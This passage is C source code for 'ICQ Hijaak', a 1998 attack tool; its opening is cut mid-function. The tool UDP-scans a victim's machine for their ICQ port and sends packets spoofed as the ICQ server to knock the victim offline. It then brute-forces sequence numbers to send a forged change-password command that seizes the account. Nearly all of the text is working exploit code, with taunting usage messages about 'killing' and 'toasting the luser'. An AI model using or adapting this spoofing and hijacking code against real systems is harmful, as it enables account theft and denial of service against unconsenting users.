(u16)~pchecksum ; } int CreateRawSocket( void ) { int s; int option; s = socket( AF_INET, SOCK_RAW, IPPROTO_RAW ); if ( s < 0 ) { perror("Socket:"); exit(-1); } option = 1; if ( setsockopt( s, IPPROTO_IP, IP_HDRINCL, (char *)&option, sizeof( option ) ) < 0 ) { perror("Setting IP_HDRINCL"); exit(0); } return s; } int GetLocalAddress( struct in_addr remote, struct in_addr * local ) { struct sockaddr_in laddress; struct sockaddr * laddr = (struct sockaddr *)&laddress; struct sockaddr_in raddress; struct sockaddr * raddr = (struct sockaddr *)&raddress; int s; int err; int len; s = socket( AF_INET, SOCK_DGRAM, IPPROTO_UDP ); if ( s < 1 ) { return FAILURE; } raddress.sin_port = htons( 1984 ); /* DON'T CARE */ raddress.sin_family = AF_INET; raddress.sin_addr = remote; err = connect(s, raddr, sizeof(raddress )); if ( err < 0 ) { return FAILURE; } len = sizeof(laddress); err = getsockname(s, laddr, &len ); if ( err < 0 ) { return FAILURE; } *local = laddress.sin_addr; close(s); return SUCCESS; } int CreateICMPSocket( void ) { int s; s = socket( AF_INET, SOCK_RAW, IPPROTO_ICMP ); if ( s < 1 ) return FAILURE; return s; } int SendUDP( int s, struct in_addr source, struct in_addr dest, u16 sport, u16 tport ) { static u8 packet[576]; struct sockaddr_in raddress; struct sockaddr * raddr = (struct sockaddr *)&raddress; int psize; int err; raddress.sin_port = htons( 1984 ); /* DON'T CARE */ raddress.sin_family = AF_INET; raddress.sin_addr = dest; psize = IP_END + UDP_END + 6; make_ip_hdr( packet, psize, IPPROTO_UDP, 0x666, 0, source, dest, 0x7F ); make_udp_hdr( packet, psize - IP_END, sport, tport); err = sendto( s, packet, psize, 0,raddr, sizeof(raddress)); if ( err != psize ) { perror("Sending"); return FAILURE; } return SUCCESS; } const int verify_secs = 2; int VerifyUDPPort( struct in_addr addr, u16 port ) { int s_icmp; struct timeval start_time, end_time, wait_time; fd_set rdfs; int err; static u8 packet[1500]; /* should be max MTU */ struct sockaddr junkaddr; int junksize; u8 * icmphdr; u8 * fiphdr; u8 * fudphdr; int len; int got_unreach; struct in_addr localaddr; int rawsock; if ( GetLocalAddress(addr, &localaddr) == FAILURE ) { perror("GetLocalAddress"); exit(-1); } s_icmp = CreateICMPSocket(); if ( s_icmp == FAILURE ) { perror("Getting ICMP socket"); exit(-1); } rawsock = CreateRawSocket(); if ( rawsock < 0 ) { perror("Getting Raw socket"); exit(-1); } FD_ZERO( &rdfs ); FD_SET( s_icmp, &rdfs ); if ( SendUDP(rawsock, localaddr, addr, 0x1984, port ) == FAILURE ) { perror("Sending UDP packet"); exit(-1); } got_unreach = 0; gettimeofday( &start_time, NULL ); do { wait_time.tv_usec = 0; wait_time.tv_sec = verify_secs; err = select( s_icmp+1, &rdfs, NULL, NULL, &wait_time ); if ( -1 == err ) { perror("VerifyUDPPort - Select"); exit(-1); } if ( !err ) break; junksize = sizeof( struct sockaddr ); err = recvfrom( s_icmp, packet, 1500, 0, &junkaddr, &junksize ); if ( -1 == err ) { perror("VerifyUDPPort - recvfrom: "); exit(-1); } if ( (byte(*packet,IP_PROTOCOL ) != IPPROTO_ICMP ) || (dword(*packet, IP_SRC ) != *((u32 *)&addr) ) ) goto check_timeout; len = ( byte(*packet, 0 ) & 0x0F ) * 4; icmphdr = packet + len; if ( (byte(*icmphdr,ICMP_TYPE ) != 3 ) || (byte(*icmphdr,ICMP_CODE ) != 3 ) ) goto check_timeout; fiphdr = icmphdr + ICMP_END + 4/*clear error code*/; len = ( byte(*fiphdr, 0 ) & 0x0F ) * 4; if ( (byte(*fiphdr,IP_PROTOCOL ) != IPPROTO_UDP ) || ( (dword(*fiphdr, IP_DST ) != *((u32 *)&addr) ) ) ) goto check_timeout; fudphdr = fiphdr + len; if ( word(*fudphdr, UDP_DEST ) == htons( port ) ) { got_unreach = 1; break; } check_timeout: gettimeofday( &end_time, NULL ); } while ( ( end_time.tv_sec - start_time.tv_sec ) < verify_secs ); close( s_icmp ); close( rawsock); if ( got_unreach ) return FAILURE; else return SUCCESS; } typedef struct foobar { int next; int prev; u16 rem_port; int times; } port_info; #define MAX_BURST 128 #define UNUSED_HEAD MAX_BURST + 1 #define UNUSED_TAIL MAX_BURST + 2 #define LIVE_HEAD MAX_BURST + 3 #define LIVE_TAIL MAX_BURST + 4 #define FIRST_LPORT 55000 #define SEND_COUNT 3 #define NEXT(i) List[(i)].next #define PREV(i) List[(i)].prev #define PORT(i) List[(i)].rem_port #define TIMES(i) List[(i)].times int UDPScan( struct in_addr addr, u16 start, u16 end, u16 * tport ) { int unused_head; int unused_tail; int live_head; int live_tail; int i; port_info List[ LIVE_TAIL + 1 ]; int Current[ MAX_BURST ]; int cur_min, cur_max; int now_port; int delay; int my_port; int cur_send; struct timeval wait_time; fd_set rdfs; int err; int s_icmp, rawsock; struct in_addr localaddr; *tport = 0; if ( GetLocalAddress(addr, &localaddr) == FAILURE ) { perror("GetLocalAddress"); return FAILURE; } s_icmp = CreateICMPSocket(); if ( s_icmp == FAILURE ) { perror("Getting ICMP socket"); return FAILURE; } rawsock = CreateRawSocket(); if ( rawsock < 0 ) { perror("Getting Raw socket"); return FAILURE; } FD_ZERO( &rdfs ); FD_SET( s_icmp, &rdfs ); List[ LIVE_TAIL ].next = -1; List[ LIVE_TAIL ].prev = LIVE_HEAD; List[ LIVE_TAIL ].rem_port = 0; List[ LIVE_HEAD ].prev = -1; List[ LIVE_HEAD ].next = LIVE_TAIL; List[ LIVE_HEAD ].rem_port = 0; List[ UNUSED_TAIL ].next = -1; List[ UNUSED_TAIL ].prev = UNUSED_HEAD; List[ UNUSED_TAIL ].rem_port = 0; List[ UNUSED_HEAD ].prev = -1; List[ UNUSED_HEAD ].next = UNUSED_TAIL; List[ UNUSED_HEAD ].rem_port = 0; for ( i = 0; i < MAX_BURST ; i++ ) { PREV( i ) = PREV( UNUSED_TAIL ); NEXT( i ) = UNUSED_TAIL; NEXT( PREV( i ) ) = i; PREV( NEXT( i ) ) = i; PORT( i ) = 0; TIMES( i ) = SEND_COUNT; } now_port = start; cur_min = now_port; cur_max = MAX_BURST; my_port = FIRST_LPORT; cur_send = 16; while ( 1 ) { int cur; int cnt; cur_max = cur_send; cur_min = now_port; cur = List[ LIVE_HEAD ].next; cnt = 0; while ( NEXT(cur) != -1 ) { if (!cur_max ) { break; } cnt++; if ( SendUDP(rawsock, localaddr, addr, my_port, PORT(cur) ) == FAILURE ) { perror("Sending UDP packet"); return FAILURE; } cur_max--; TIMES(cur)--; cur = NEXT(cur); if ( NEXT(cur) > LIVE_TAIL ) { printf("Ugh! %d \n", NEXT(cur) ); exit(-1); } } for ( i = 0; i < cur_max ; i ++ ) { int node; if ( cur_min > end ) break; node = NEXT( UNUSED_HEAD ); if ( -1 == NEXT( node ) ) break; NEXT( UNUSED_HEAD ) = NEXT( node ); PREV( NEXT(node) ) = UNUSED_HEAD; PREV( node ) = PREV( LIVE_TAIL ); NEXT( node ) = LIVE_TAIL; NEXT( PREV( node ) ) = node; PREV( NEXT( node ) ) = node; PORT( node ) = cur_min + i; if ( SendUDP(rawsock, localaddr, addr, my_port, cur_min+i ) == FAILURE ) { perror("Sending UDP packet"); return FAILURE; } Current[ i ] = node; } if ( ( now_port >= end ) && ( !cnt ) ) { printf("Found nothing!\n"); return SUCCESS; } now_port += cur_max; /* * Delay, waiting for responses. Continue until the * operation times out, meaning that we waited long enough * for a packet.. */ cnt = 0; while ( 1 ) { int junksize; static struct sockaddr junkaddr; static u8 packet[1500]; int len; u8 * icmphdr, * fiphdr, *fudphdr; int got_port; int cur; wait_time.tv_usec = 0; wait_time.tv_sec = 5; FD_SET( s_icmp, &rdfs ); err = select( s_icmp+1, &rdfs, NULL, NULL, &wait_time ); if ( -1 == err ) { perror("UDPSCAN - Select"); return FAILURE; } if ( !err ) { break; } junksize = sizeof( struct sockaddr ); err = recvfrom( s_icmp, packet, sizeof(packet), 0, &junkaddr, &junksize ); if ( -1 == err ) { perror("UDPSCAN - recvfrom: "); exit(-1); } if ( (byte(*packet,IP_PROTOCOL ) != IPPROTO_ICMP ) || (dword(*packet, IP_SRC ) != *((u32 *)&addr) ) ) continue; len = ( byte(*packet, 0 ) & 0x0F ) * 4; icmphdr = packet + len; if ( (byte(*icmphdr,ICMP_TYPE ) != 3 ) || (byte(*icmphdr,ICMP_CODE ) != 3 ) ) continue; fiphdr = icmphdr + ICMP_END + 4/*clear error code*/; len = ( byte(*fiphdr, 0 ) & 0x0F ) * 4; if ( (byte(*fiphdr,IP_PROTOCOL ) != IPPROTO_UDP ) || ( (dword(*fiphdr, IP_DST ) != *((u32 *)&addr) ) ) ) continue; fudphdr = fiphdr + len; got_port = ntohs( word(*fudphdr, UDP_DEST ) ) ; if ( ( got_port >= cur_min ) && ( got_port < (cur_min+cur_max) ) ) { cur = Current[ got_port - cur_min ]; PREV( NEXT(cur) ) = PREV( cur ); NEXT( PREV(cur) ) = NEXT( cur ); PREV( cur ) = PREV( UNUSED_TAIL ); NEXT( cur ) = UNUSED_TAIL; NEXT( PREV( cur ) ) = cur; PREV( NEXT( cur ) ) = cur; cnt++; continue; } /* * if we get here, then it was one of the older * ones, so look through the array for it */ cur = NEXT( LIVE_HEAD ); while ( NEXT(cur) != -1 ) { if ( PORT(cur) == got_port ) { PREV( NEXT(cur) ) = PREV( cur ); NEXT( PREV(cur) ) = NEXT( cur ); PREV( cur ) = PREV( UNUSED_TAIL ); NEXT( cur ) = UNUSED_TAIL; NEXT( PREV( cur ) ) = cur; break; } cur = NEXT(cur); } if ( NEXT(cur) == -1 ) { printf("RESPONSE FOR PORT %d UNEXPECTED! \n", got_port); } else { cnt++; } } printf("[UDP Scan working] Got %d responses \n", cnt ); if ( cnt < ( (cur_send/4) * 3 ) ) { cur_send /= 2; if ( cur_send < 16 ) { cur_send = 16; } } else { cur_send *= 2; if ( cur_send > MAX_BURST ) { cur_send = MAX_BURST; } } cur = NEXT( LIVE_HEAD ); while ( NEXT(cur) != -1 ) { if (!TIMES(cur) ) { printf("SCORE! Port is %d \n",PORT(cur)); close( s_icmp ); close( rawsock); *tport = PORT(cur); return SUCCESS; } cur = NEXT(cur); } } close( s_icmp ); close( rawsock); return SUCCESS; } #define COMMAND_CHANGEPASSWORD 0x049C #define COMMAND_LOGOFF 0x0438 #define RESPONSE_ERROR 0x00F0 int WritePacket(u8 * data_ptr, int * size, char * format, ... ) { u8 * ptr; va_list ap; u32 dword_param; u16 word_param; u8 byte_param; u8 * string_param; int string_length; int * data_length; ap = va_start( ap, format ); ptr = data_ptr; while ( *format ) { switch ( *format++ ) { case 'L': /* dword */ dword_param = va_arg(ap, u32 ); *(ptr++) = dword_param & 0xFF; *(ptr++) = (dword_param >> 8 ) & 0xFF; *(ptr++) = (dword_param >> 16) & 0xFF; *(ptr++) = (dword_param >> 24) & 0xFF; break; case 'W': /* word */ word_param = va_arg(ap, u16 ); *(ptr++) = word_param & 0xFF; *(ptr++) = (word_param >> 8 ) & 0xFF; break; case 'B': /* Byte */ byte_param = va_arg(ap, u8 ); *(ptr++) = byte_param; break; case 'S': /* ICQ string */ string_param = va_arg(ap, u8 * ); string_length = strlen( string_param ) + 1; *(ptr++) = (string_length ) & 0xFF; *(ptr++) = (string_length >> 8) & 0xFF; memcpy( ptr, string_param, string_length ); ptr += string_length; break; case 'D': /* pure data with length byte */ data_length = va_arg(ap, int * ); string_param = va_arg(ap, u8 * ); memcpy( ptr, string_param , *data_length ); ptr += *data_length; break; default: fprintf(stderr,"Invalid type %c \n", *(format-1) ); return FAILURE; } } /* return the size taken up */ *size = (ptr - data_ptr ); return SUCCESS; } u32 icq_uin = -1; u16 icq_seq = 0; u16 icq_seq2 = 0; #define ICQ4_VER 0 #define ICQ4_RANDOM 2 #define ICQ4_ZERO 4 #define ICQ4_COMMAND 6 #define ICQ4_SEQ 8 #define ICQ4_SEQ2 10 #define ICQ4_UID 12 #define ICQ4_CHECK 16 #define ICQ4_END 20 void create_icq4_hdr( u8 * data_ptr, u16 any_number, u16 command, int data_size ) { u32 check; u32 check2; u32 keyvalue; int count; int length; int i; u8 ofs; u8 val; length = data_size + ICQ4_END; memset( data_ptr, 0, ICQ4_END ); word(*data_ptr, ICQ4_VER ) = 0x4; word(*data_ptr, ICQ4_RANDOM) = any_number; word(*data_ptr, ICQ4_COMMAND ) = command; word(*data_ptr, ICQ4_SEQ ) = icq_seq; word(*data_ptr, ICQ4_SEQ2 ) = icq_seq2; dword(*data_ptr,ICQ4_UID ) = icq_uin; dword(*data_ptr,ICQ4_CHECK) = 0x0; check = ( *(data_ptr + 8) << 24) | ( *(data_ptr + 4) << 16 ) | ( *(data_ptr + 2) << 8 ) | ( *(data_ptr + 6) ); ofs = random() % length; val = *(data_ptr + ofs ); check2 = ( ofs << 24 ) | ( val << 16 ); ofs = random() % 256; val = icq_check_data[ ofs ]; check2 |= ( ofs << 8 ) | ( val ); check2 ^= 0x00FF00FF; check ^= check2; dword(*data_ptr,ICQ4_CHECK ) = check; keyvalue = length * 0x66756B65; keyvalue += check; count = ( length + 3 ) / 4; count += 3; count /= 4; for ( i = 0; i < count ; i++ ) { u32 * r; if ( i == 4 ) continue; r = (u32 *)(data_ptr + (i*4) ); *r ^= (keyvalue + icq_check_data[i*4] ); } word(*data_ptr, ICQ4_VER ) = 0x4; /* NECESSARY! */ } void create_icq3_header( u8 * data_ptr, int * size, u16 command, u16 seq1, u16 seq2, u32 UIN ) { int len, len2, err, ofs, val; u32 check, check2; err = WritePacket( data_ptr,&len, "WWWWL", 0x03, command, seq1, seq2, UIN ); if ( err == FAILURE ) { printf("Programmer Error in create_icq3_header\n"); exit(-1); } check = ( *(data_ptr + 8) << 24) | ( *(data_ptr + 4) << 16 ) | ( *(data_ptr + 2) << 8 ) | ( *(data_ptr + 6) ); ofs = random() % len; val = *(data_ptr + ofs ); check2 = ( ofs << 24 ) | ( val << 16 ); ofs = random() % 256; val = icq_check_data[ ofs ]; check2 |= ( ofs << 8 ) | ( val ); check2 ^= 0x00FF00FF; check ^= check2; err = WritePacket( (data_ptr + len),&len2,"L", check ); *size = len + len2; } static u8 packet[ 1500 ]; void main( int argc, char ** argv ); void main( int argc, char ** argv ) { int count; int i; u16 j, k; struct in_addr * addr_list; struct in_addr * target_list; int err; struct in_addr you; struct in_addr me; int rawsock; struct sockaddr raddr; struct sockaddr_in * r_in = (struct sockaddr_in *)&raddr; int size; u8 * data_ptr; u8 * hdr_ptr; int hdr_size; u16 your_port; int retries; int base_port; if ( argc < 5 ) { fprintf(stderr, "--=--==[ ICQ Hijaak ]=====------------------------==--------------\n" "Author: wumpus@innocent.com * Copyright (c) 1998 Wolvesbane\n" "[ http://www.rootshell.com/ ] - Usage: \n" " hijaak [options] icq-server target-uin target-ip new-password \n" "\n" "icq-server: Packets will be *spoofed* from the (possibly plural) \n" " IP addresses of this parameter. \n" "\n" "target-uin: D'Oh! \n\n" "target-ip: Finding this is up to you. May the farce be with you\n" "\nnew-password: D'Oh! Take a guess \n" "\nNo options are available at this time.\n" ); exit(-1); } base_port = 0; if ( argc > 5 ) { base_port = atoi( argv[5] ); } if (!base_port) base_port = 1024; icq_uin = atol( argv[2] ); if ( !icq_uin ) { fprintf(stderr, "Who do you want me to kill, boss? \n"); exit(-1); } err = MultiResolve(argv[3],&count,&target_list); if ( err == -1 ) { herror("Resolving target\n"); exit(-1); } if ( count > 1 ) { fprintf(stderr, "Hey! Moron! You need to specify an UNAMBIGUOUS victim IP. \n" ); exit(-1); } you = target_list[0]; free( target_list ); err = MultiResolve(argv[1],&count,&addr_list); if ( err == -1 ){ herror("Resolving ICQ server"); exit(-1); } r_in->sin_port = htons( 1984 ); /* DON'T CARE */ r_in->sin_family = AF_INET; r_in->sin_addr = you; hdr_ptr = packet + IP_END + UDP_END; rawsock = CreateRawSocket(); printf("** Scanning for luser's ICQ port ...\n"); your_port = base_port; while ( 1 ) { err = UDPScan(you, your_port, 65535, &your_port ); if ( ( err == -1 ) || ( !your_port ) ) { fprintf(stderr, "D'Oh! Can't find a target port. Better check that target IP again!\n"); exit(-1); } if ( FAILURE == VerifyUDPPort( you, your_port ) ) { fprintf(stderr, "UDP scan found invalid port. Retrying... Hit CTRL-C to exit\n"); continue; } break; } printf("*** Got luser's port at %d \n", your_port ); create_icq3_header(hdr_ptr, &hdr_size, RESPONSE_ERROR, 0, 0, icq_uin ); retries = 3; while ( retries-- ) { printf("Trying to knock luser offline. Attempt %d\n", 3 - retries ); for ( i = 0; i < count ; i++ ) { int psize; psize = IP_END + UDP_END + hdr_size; make_ip_hdr( packet, psize, IPPROTO_UDP, 0x666, 0, addr_list[i], you, 0x7F ); make_udp_hdr( packet, psize - IP_END, 4000,your_port ); err = sendto( rawsock, packet, psize, 0, &raddr, sizeof(raddr)); if ( err != psize ) { perror("Sending"); exit(-1); } } if ( FAILURE == VerifyUDPPort( you, your_port ) ) { break; } sleep( 3 ); /* Give 'em some time */ if ( FAILURE == VerifyUDPPort( you, your_port ) ) { break; } sleep(3); } printf("Retries is %d \n", retries ); if ( 0 > retries ) { fprintf(stderr, "Uh Oh! Something ain't working. Can't toast the luser. Sorry, dude.\n"); exit(-1); } /* more time? how long does it take to reconnect? */ sleep(16); printf("** Scanning for luser's _new_ ICQ port ...\n"); while ( 1 ) { err = UDPScan(you, your_port, 65535, &your_port ); if ( ( err == -1 ) || ( !your_port ) ) { fprintf(stderr, "D'Oh! Can't find the new port! Maybe your target is smarter than you?\n"); exit(-1); } if ( FAILURE == VerifyUDPPort( you, your_port ) ) { fprintf(stderr, "New UDP scan found invalid port. Retrying... Hit CTRL-C to exit\n"); continue; } break; } printf("*** Got luser's new connection at %d \n", your_port ); printf("*** Hijaaking account now...(*LONG* version)\n"); for ( k = 0; k < 14 ; k++ ) { for ( j = 0; j < 14 ; j++ ) { int psize; icq_seq = k; icq_seq2 = j; data_ptr = hdr_ptr + ICQ4_END; WritePacket( data_ptr, &size, "S",argv[4] ); create_icq4_hdr(hdr_ptr, random()&0xFFFF, COMMAND_CHANGEPASSWORD, size ); hdr_size = ICQ4_END; for ( i = 0; i < count ; i++ ) { psize = IP_END + UDP_END + hdr_size + size; make_ip_hdr( packet, psize, IPPROTO_UDP, 0x666, 0, you, addr_list[i], 0x7F ); make_udp_hdr( packet, psize - IP_END, your_port, 4000); err = sendto( rawsock, packet, psize, 0, &raddr, sizeof(raddr)); if ( err != psize ) { perror("Sending"); exit(-1); } usleep( 1000 ); err = sendto( rawsock, packet, psize, 0, &raddr, sizeof(raddr)); if ( err != psize ) { perror("Sending"); exit(-1); } } } } printf("Disconnecting the remote luser... \n"); create_icq3_header(hdr_ptr, &hdr_size, RESPONSE_ERROR, 0, 0, icq_uin ); for ( i = 0; i < count ; i++ ) { int psize; psize = IP_END + UDP_END + hdr_size; make_ip_hdr( packet, psize, IPPROTO_UDP, 0x666, 0, addr_list[i], you, 0x7F ); make_udp_hdr( packet, psize - IP_END, 4000,your_port ); err = sendto( rawsock, packet, psize, 0, &raddr, sizeof(raddr)); if ( err != psize ) { perror("Sending"); exit(-1); } } free( addr_list ); } -----------Corte aqui 1998 FW - Corporation <><><><><><><><><><><><><>